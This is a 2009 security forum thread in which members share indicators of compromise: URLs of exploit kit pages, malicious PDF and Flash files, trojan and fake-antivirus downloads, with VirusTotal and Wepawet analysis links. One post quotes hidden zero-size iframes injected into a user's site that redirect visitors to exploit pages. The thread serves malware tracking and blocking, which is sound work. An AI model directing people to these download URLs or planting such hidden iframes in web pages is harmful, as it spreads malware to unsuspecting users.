Author Topic: daily something......  (Read 837812 times)

0 Members and 2 Guests are viewing this topic.

June 04, 2009, 08:37:07 am
Reply #435

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Exploit(wepawet seem to fail on this one)
Code: [Select]
091809.ru/s/in.phpPDF:
Code: [Select]
091809.ru/s/pdf.phphttp://wepawet.iseclab.org/view.php?hash=f5b00bed476324a303df8f4b4d8ac8c1&t=1244100976&type=js
seems like abit alterd variant of Emold trojan:
Code: [Select]
091809.ru/s/load.php?id=3http://www.virustotal.com/analisis/05e9c38100c6d59e834be1b848ab824eefe741d358e969d5e11cf6853d6ab7f5-1244100358

FTPstealer:
Code: [Select]
club25plus.de/css/vv.exehttp://www.virustotal.com/analisis/1db0daee62d2103eab7c84383e05505b6d6612aaef14da7641f1ceabd6d2f65a-1244101252
Trojan:
Code: [Select]
club25plus.de/css/frfr5.exehttp://www.virustotal.com/analisis/e8165bde7ebbcd65464ee27f7121128885e91b373ce83a3adb53e1e1975ec5d8-1244101967

Fake AV:
Code: [Select]
tubepornolive.com/scan/
Exploits:
Code: [Select]
bfegrtuker.ru/bede/in.phphttp://wepawet.iseclab.org/view.php?hash=09d36363e30de64fc262c747c8e54d68&t=1244102863&type=js
PDF:
Code: [Select]
bfegrtuker.ru/bede/its/0.pdfFlash:
Code: [Select]
bfegrtuker.ru/bede/its/0.swfTrojan Oficla:
Code: [Select]
bfegrtuker.ru/bede/load.php?id=5
Trojan:
Code: [Select]
000007.ru/1007.exehttp://www.virustotal.com/analisis/b35aec13c9d8d5b92fd3ba42eb753f36a89b1798dfcd1068c62243f9d0e38e04-1244102905
Trojan:
Code: [Select]
234871938123.cn/svcshostes.exehttp://www.virustotal.com/analisis/80fb3f643f85d8f09f3e5f533a52917dfae9c6e009899602577b6113dabf0ec7-1244103136

Trojans(all seem to be Rustock):
Code: [Select]
yayandex.com/1.exehttp://www.virustotal.com/analisis/c9ab5cd07f75505444777caebc1ba203c4d6a3cfa079516f5b231f5cbea4cb6c-1244103292
Code: [Select]
yayandex.com/2.exehttp://www.virustotal.com/analisis/34f7a41324eaaaefd45357ed16f89b8a9add7e839c54fc4897610fc831e56a44-1244103465
Code: [Select]
yayandex.com/3love.exehttp://www.virustotal.com/analisis/1f0f682ac26bc3c2c3d3153b282e09e68c97277b0dfc49f3a97519d42033410d-1244103873
all communicate with:
Code: [Select]
yabombs.com/1/getcfg.php
Mal-Aware

June 04, 2009, 07:12:40 pm
Reply #436

sparsha

  • Special Members
  • Hero Member

  • Offline
  • *

  • 305
Fake/Scare scanner

Code: [Select]
http://antimalwareliveproscannerv3.com/1/?id=2018&smersh=c144eb244&back==TQ2yTDxNMQOMI=N
Fake flash player - downloads Rogue

Code: [Select]
http://big-pornnet.com/promo1/get.php?aid=780&vname=flash_player_v11
Couple of links on the rotators

Code: [Select]
http://top-pornnet.com/promo3/?aid=763&vname=flash_player.exe
http://mybig-portal.com/promo3/?aid=763&vname=protect.exe

June 07, 2009, 06:07:13 am
Reply #437

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Fake movie page:
Code: [Select]
tube-xxx-work.com/xplays.php?id=40016downloads:
Code: [Select]
exe-web-development.com/streamviewer.40016.exehttp://www.virustotal.com/analisis/76b8a3599fc04cfe7adecab36805615f82b7e73c8b8980f2ecbb3cd94cee5ba3-1244350815

Fake AV:
Code: [Select]
mysex-adult.com/promo1/soft/install-1557.exeRustock:
Code: [Select]
rarambler.com/ra/2.exehttp://www.virustotal.com/analisis/a67f6dcc6c43deaa623d88882cf591f742552615cc59cd3620cda86dbbbc618e-1244353129
Communicates with:
Code: [Select]
systemjud.com/start/admo/getcfg.php
Mal-Aware

June 07, 2009, 01:20:34 pm
Reply #438

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Today a user reported the following:

Code: [Select]
i found these two in my site:

<iframe src=\"http://85.10.221.161/in.cgi?2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>


<iframe src=\"http://global-analitics.com/in.cgi?2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>

Code: [Select]
85.10.221.161/in.cgi?2
redirects to multiple exploits at

Code: [Select]
searchsuggest.cn/catalog/x.php?q=1
payload is
Code: [Select]
searchsuggest.cn/catalog/q.php?s=2'http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1243633951

I'm unable to download it from machine, don't know why.

The other url
Code: [Select]
global-analitics.com/in.cgi?2doesn't seem to work at the moment.
Ruining the bad guy's day

June 07, 2009, 02:37:53 pm
Reply #439

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Payload;

/catalog/bookz.pdf
http://www.virustotal.com/analisis/3fcbd6e988183b20a18c13f6125d41bc6ee346c7dd5a198bee4e5de8fdabc927-1244385255

/catalog/next.exe
http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1244385214

I was only able to grab them by feeding it the correct referer (x.php?q=1)

I can't get the other one to work either .....
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 08, 2009, 07:37:18 pm
Reply #440

sparsha

  • Special Members
  • Hero Member

  • Offline
  • *

  • 305
System Security rogue related sites

Code: [Select]
http://nicleaner.com/hitin.php?land=20&affid=02941
http://nicleaner.com/download.php?affid=02941

http://bestscanjet.com/index.php?affid=09300
http://bestscanjet.com/download.php?affid=09300

http://Dapcleaner.com/hitin.php?land=20&affid=02941
http://dapcleaner.com/download.php?affid=02941

http://sucleaner.com/index.php?affid=02941
http://sucleaner.com/download.php?affid=02941

http://Websecurityread.com/hitin.php?land=20&affid=02941
http://websecurityread.com/download.php?affid=02941

http://Spyscansolution.com/hitin.php?land=20&affid=02941
http://spyscansolution.com/download.php?affid=00000

June 09, 2009, 05:07:16 am
Reply #441

XiTri

  • Jr. Member

  • Offline
  • **

  • 24
Code: [Select]
http://e-point.com.ua/ratingz/load.php
Kaspersky - Trojan-Banker.Win32.Banker.aflq
McAfee verdict: PWS-Banker

June 09, 2009, 10:42:20 am
Reply #442

sparsha

  • Special Members
  • Hero Member

  • Offline
  • *

  • 305
Win PC Defender rogue
Code: [Select]
http://pornotube911.com/codec/186.exe
http://downloadfixandlove.com/pcdef.exe
http://downloadfixandlove.com/file.exe

Antivirus System Pro
Code: [Select]
antivir2009pro.com
Inetantivir.com
Inetantivirus.com
Inetavirus.com
209.44.111.57/block.php?r=8.0

June 09, 2009, 11:08:00 am
Reply #443

promised

  • Jr. Member

  • Offline
  • **

  • 21
onlinegames
Quote
2:http://61.160.247.37/xiao/aa1.exe
2:http://61.160.247.37/xiao/aa2.exe
2:http://61.160.247.37/xiao/aa3.exe
2:http://61.160.247.37/xiao/aa4.exe
2:http://61.160.247.37/xiao/aa5.exe
2:http://61.160.247.37/xiao/aa6.exe
2:http://61.160.247.37/xiao/aa7.exe
2:http://61.160.247.37/xiao/aa8.exe
2:http://61.160.247.37/xiao/aa9.exe
2:http://61.160.247.37/xiao/aa10.exe
2:http://61.160.247.37/xiao/aa11.exe
2:http://61.160.247.37/xiao/aa12.exe
2:http://61.160.247.37/xiao/aa13.exe
2:http://61.160.247.37/xiao/aa14.exe
2:http://61.160.247.37/xiao/aa15.exe
2:http://61.160.247.37/xiao/aa16.exe
2:http://61.160.247.37/xiao/aa17.exe
2:http://61.160.247.37/xiao/aa18.exe
2:http://61.160.247.37/xiao/aa19.exe
2:http://61.160.247.37/xiao/aa20.exe
2:http://61.160.247.37/xiao/aa21.exe
2:http://61.160.247.37/xiao/aa22.exe
2:http://61.160.247.37/xiao/aa23.exe
2:http://61.160.247.37/xiao/aa24.exe
2:http://61.160.247.37/xiao/aa25.exe
2:http://61.160.247.37/xiao/aa26.exe
2:http://61.160.247.37/xiao/aa27.exe
2:http://61.160.247.37/xiao/aa28.exe
2:http://61.160.247.37/xiao/aa29.exe
2:http://61.160.247.37/xiao/aa30.exe
2:http://61.160.247.37/xiao/aa31.exe
2:http://61.160.247.37/xiao/aa32.exe
2:http://61.160.247.37/xiao/aa33.exe
2:http://61.160.247.37/xiao/aa34.exe
2:http://61.160.247.37/xiao/aa35.exe
2:http://61.160.247.37/xiao/aa36.exe
2:http://61.160.247.37/xiao/1.exe

June 09, 2009, 11:09:59 am
Reply #444

promised

  • Jr. Member

  • Offline
  • **

  • 21
onlinegames
Quote
hxxp://121.12.115.11:886/down/aa01.exe
hxxp://121.12.115.11:886/down/aa02c.exe
hxxp://121.12.115.11:886/down/ts.exe
hxxp://121.12.115.11:886/down/aa03d.exe
hxxp://121.12.115.11:886/down/aa04b.exe
hxxp://121.12.115.11:886/down/aa21g.exe
hxxp://121.12.115.11:886/down/aa05b.exe
hxxp://121.12.115.11:886/down/aa06d.exe
hxxp://121.12.115.11:886/down/aa31b.exe
hxxp://121.12.115.11:886/down/aa08d.exe
hxxp://121.12.115.11:886/down/aa09a.exe
hxxp://121.12.115.11:886/down/aa10d.exe
hxxp://121.12.115.11:886/down/aa11a.exe
hxxp://121.12.115.11:886/down/aa12.exe
hxxp://121.12.115.11:886/down/aa13c.exe
hxxp://121.12.115.11:886/down/aa32e.exe
hxxp://121.12.115.11:886/down/aa33a.exe
hxxp://121.12.115.11:886/down/aa26d.exe
hxxp://121.12.115.11:886/down/aa27a.exe
hxxp://121.12.115.11:886/down/aa31b.exe
hxxp://121.12.115.11:886/down/aa15d.exe
hxxp://121.12.115.11:886/down/aa17.exe
hxxp://121.12.115.11:886/down/aa18a.exe
hxxp://121.12.115.11:886/down/aa19c.exe
hxxp://121.12.115.11:886/down/aa20a.exe
hxxp://121.12.115.11:886/down/aa29a.exe
hxxp://121.12.115.11:886/down/aa22.exe
hxxp://121.12.115.11:886/down/aa23a.exe
hxxp://121.12.115.11:886/down/aa24.exe
hxxp://121.12.115.11:886/down/aa25a.exe
hxxp://121.12.115.11:886/down/aa28.exe
hxxp://121.12.115.11:886/down/aa30.exe
hxxp://121.12.115.11:886/down/ms.exe

June 09, 2009, 11:44:46 am
Reply #445

sparsha

  • Special Members
  • Hero Member

  • Offline
  • *

  • 305
Code: [Select]
http://av-guard.net/?uid=102&pid=3

June 09, 2009, 06:56:24 pm
Reply #446

promised

  • Jr. Member

  • Offline
  • **

  • 21
onlinegames
Quote
hxxp://www.2a8k.cn/d/51.exe
hxxp://www.2a8k.cn/d/50.exe
hxxp://www.2a8k.cn/d/29.exe
hxxp://www.2a8k.cn/d/13.exe
hxxp://www.2a8k.cn/d/24.exe
hxxp://www.2a8k.cn/d/25.exe
hxxp://www.2a8k.cn/d/35.exe
hxxp://www.2a8k.cn/d/34.exe
hxxp://www.2a8k.cn/d/33.exe
hxxp://www.2a8k.cn/d/36.exe
hxxp://www.2a8k.cn/d/42.exe
hxxp://www.2a8k.cn/d/39.exe
hxxp://www.2a8k.cn/d/43.exe
hxxp://www.2a8k.cn/d/22.exe
hxxp://www.2a8k.cn/d/23.exe
hxxp://www.2a8k.cn/d/26.exe
hxxp://www.2a8k.cn/d/27.exe
hxxp://www.2a8k.cn/d/32.exe
hxxp://www.2a8k.cn/d/28.exe
hxxp://www.2a8k.cn/d/8.exe
hxxp://www.2a8k.cn/d/21.exe
hxxp://www.2a8k.cn/d/20.exe
hxxp://www.2a8k.cn/d/11.exe
hxxp://www.2a8k.cn/d/19.exe
hxxp://www.2a8k.cn/d/10.exe
hxxp://www.2a8k.cn/d/18.exe
hxxp://www.2a8k.cn/d/9.exe
hxxp://www.2a8k.cn/d/3.exe
hxxp://www.2a8k.cn/d/4.exe
hxxp://www.2a8k.cn/d/7.exe
hxxp://www.2a8k.cn/d/2.exe
hxxp://www.2a8k.cn/d/17.exe
hxxp://www.2a8k.cn/d/16.exe
hxxp://www.2a8k.cn/d/15.exe
hxxp://www.2a8k.cn/d/14.exe
hxxp://www.2a8k.cn/d/12.exe
hxxp://www.2a8k.cn/d/1.exe
Quote
hxxp://5yttrre.cn/xx33.exe
hxxp://5yttrre.cn/xx13.exe
hxxp://5yttrre.cn/xx26.exe
hxxp://5yttrre.cn/xx27.exe
hxxp://5yttrre.cn/xx28.exe
hxxp://5yttrre.cn/xx29.exe
hxxp://5yttrre.cn/xx30.exe
hxxp://5yttrre.cn/xx31.exe
hxxp://5yttrre.cn/xx11.exe
hxxp://5yttrre.cn/xx9.exe
hxxp://5yttrre.cn/xx12.exe
hxxp://5yttrre.cn/xx14.exe
hxxp://5yttrre.cn/xx10.exe
hxxp://5yttrre.cn/xx39.exe
hxxp://5yttrre.cn/xx15.exe
hxxp://5yttrre.cn/xx32.exe
hxxp://5yttrre.cn/xx8.exe
hxxp://5yttrre.cn/xx17.exe
hxxp://5yttrre.cn/xx23.exe
hxxp://5yttrre.cn/xx20.exe
hxxp://5yttrre.cn/xx22.exe
hxxp://5yttrre.cn/xx25.exe
hxxp://5yttrre.cn/xx18.exe
hxxp://5yttrre.cn/xx19.exe
hxxp://5yttrre.cn/xx24.exe
hxxp://5yttrre.cn/xx6.exe
hxxp://5yttrre.cn/xx16.exe
hxxp://5yttrre.cn/xx3.exe
hxxp://5yttrre.cn/xx21.exe
hxxp://5yttrre.cn/xx5.exe
hxxp://5yttrre.cn/xx2.exe
hxxp://5yttrre.cn/xx4.exe
hxxp://5yttrre.cn/xx7.exe
hxxp://5yttrre.cn/xx1.exe

June 09, 2009, 06:58:24 pm
Reply #447

promised

  • Jr. Member

  • Offline
  • **

  • 21
Quote
hxxp://u.987255.com/image/svchost.jpg
hxxp://u.987255.com/image/dd.jpg
hxxp://u.987255.com/image/bd.jpg
hxxp://a.05916.com:666/40.jpg
hxxp://u.987255.com/image/zy.jpg
hxxp://download.leeboo.com/Gvod15_286.exe
hxxp://download.leeboo.com/QvodSetup13_286.exe
hxxp://www.rtmmd.cn/h/5.exe
hxxp://58.215.79.176:88/b8.exe
hxxp://58.215.79.176:8080/b3.exe
hxxp://58.215.79.176:88/5.exe
hxxp://58.215.79.176:88/10.exe
hxxp://58.215.79.176:88/7.exe
hxxp://58.215.79.176:88/cpa.exe
hxxp://121.10.108.42/cj/1hqq.exe
hxxp://59.34.197.133/down/25.exe
hxxp://121.10.108.42/cj/2hqq.exe
hxxp://59.34.197.133/down/24.exe
hxxp://59.34.197.133/down/21.exe
hxxp://59.34.197.133/down/23.exe
hxxp://59.34.197.133/down/18.exe
hxxp://59.34.197.133/down/12.exe
hxxp://59.34.197.133/down/11.exe
hxxp://59.34.197.133/down/13.exe
hxxp://59.34.197.133/down/14.exe
hxxp://59.34.197.133/down/17.exe
hxxp://59.34.197.133/down/16.exe
hxxp://59.34.197.133/down/9.exe
hxxp://59.34.197.133/down/10.exe
hxxp://59.34.197.133/down/8.exe
hxxp://59.34.197.133/down/7.exe
hxxp://59.34.197.133/down/19.exe
hxxp://59.34.197.133/down/6.exe
hxxp://59.34.197.133/down/3.exe
hxxp://59.34.197.133/down/2.exe
hxxp://59.34.197.133/down/22.exe
hxxp://59.34.197.133/down/4.exe
hxxp://59.34.197.133/down/1.exe

June 09, 2009, 07:27:36 pm
Reply #448

CM_MWR

  • Special Members
  • Hero Member

  • Offline
  • *

  • 319

June 10, 2009, 04:55:05 am
Reply #449

promised

  • Jr. Member

  • Offline
  • **

  • 21
Quote
hxxp://alfafoxx.com/temp/find26.exe
hxxp://alfafoxx.com/temp/ret26.exe
hxxp://alfafoxx.com/temp/ldr26.exe
hxxp://www.alfafoxx.com/mldr/data/mbt.exe